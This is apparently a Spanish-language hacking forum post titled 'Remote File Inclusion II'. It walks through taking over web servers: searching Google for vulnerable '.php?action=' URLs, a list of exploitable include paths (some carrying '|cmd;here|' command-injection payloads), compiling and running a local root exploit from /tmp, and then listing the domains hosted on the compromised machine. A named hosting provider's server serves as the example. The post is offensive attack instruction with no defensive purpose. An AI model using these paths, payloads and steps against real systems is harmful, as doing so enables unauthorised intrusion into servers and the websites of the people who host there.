Remote File Inclusion II
Bueno voy a explicar como "Ownear" un server desde la tecnica Remote File Inclusion.
Como vimos la tecnica es sencilla,
Para ver el LINK que hay acá tenés que dejar de ser rata, registrarte y tener al menos 1 post.
[HACK BOX] Osea que vamos a google o yahoo y ponemos allinurl: ".php?action=" nos va a mostrar todas las webs que usan index.php?action= ahi es donde nosotros le inyectamos codigo.
Ojo no todas las webs son vulnerables, nada mas las que usan la variable $GET y $CMD
Aca les dejo algunos strings para RFI
/ashnews.php?pathtoashnews=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/shoutbox/expanded.php?conf=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/My_eGallery/public/displayCategory.php?basepath=
/yabbse/Sources/Packages.php?sourcedir=
/index.php?modpath=
/becommunity/community/index.php?from_market=Y&pageurl=
/becommunity/community/index.php?pageurl=
/index.php?sqld=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/module_db.php?pivot_path=
/catalog/includes/include_once.php?include_file=
/cgi-bin/calendar.pl?command=login&fromTemplate=|cmd;here|
/live/inc/pipe.php?HCL_path=
/zb41/include/write.php?dir=
/cgi-bin/awstats.pl?update=1&logfile=|cmd;here|
/presse/stampa.php3?azione=
/inc/step_one_tables.php?server_inc=
/index.php?mainpage=
/phpprojekt/lib/authform.inc.php?path_pre=
/include/write.php?dir=
/pivot/modules/module_db.php?pivot_path=
/captionator.php?GALLERY_BASEDIR=
Bueno ya saben la tecnica, ahora falta saber como hackiar.
En el interprete de comandos que ponemos, hacemos un uname -a alli nos mostrara algo como.
Linux us4.toservers.com 2.6.11.6Escherichia-coli-picoso #5 Tue Apr 12 18
Para ver el LINK que hay acá tenés que dejar de ser rata, registrarte y tener al menos 1 post.
32 ART 2005 i686 unknown Esa es la version de el Kernel, ese es uno de los 50 servers de Towebs.com en ese caso ese kernel rootea con un Exploit que se llama Krad, esta programado en C.
PAra compilar solo ponemos cd /tmp; gcc -o krad krad.c
Una ves compilado le damos permisos CHMOD 777 ( cd /tmp; chmod 777 krad )
Lo ejecutamos ( cd /tmp; ./krad )
Y si el kernel es vulnerable hacemos un id y nos mostrara uid=0(root) euid=0(root) guid=0(root)
Alli tenemos control total de el server.
La mayoria de las Web se encuentran alojadas en /home/user/public_html o /home/user/httpdocs luego tenemos las webs VHOST pero eso ya es aparte.
Una ves con root miramos los dominios que hay en ese server. Hacemos un
cat /etc/trueuserdomains
cat /etc/localuserdomains
Hay varios esos son los mas comunes que funcionan, nos va a tirar una lista
Para ver el LINK que hay acá tenés que dejar de ser rata, registrarte y tener al menos 1 post. Osea que el user de towebs.com es toweb, por lo tanto la web de towebs estara hosteada en /home/towebs/public_html
Eso es lo mas basico de esta tecnica, es muy larga para explicar en 15 minutso como lo hago aca, pero por cualquier duda o si quieren saber mas, a partir de ahora estoy aca.
Remote File Inclusion II 
LinkBack URL
About LinkBacks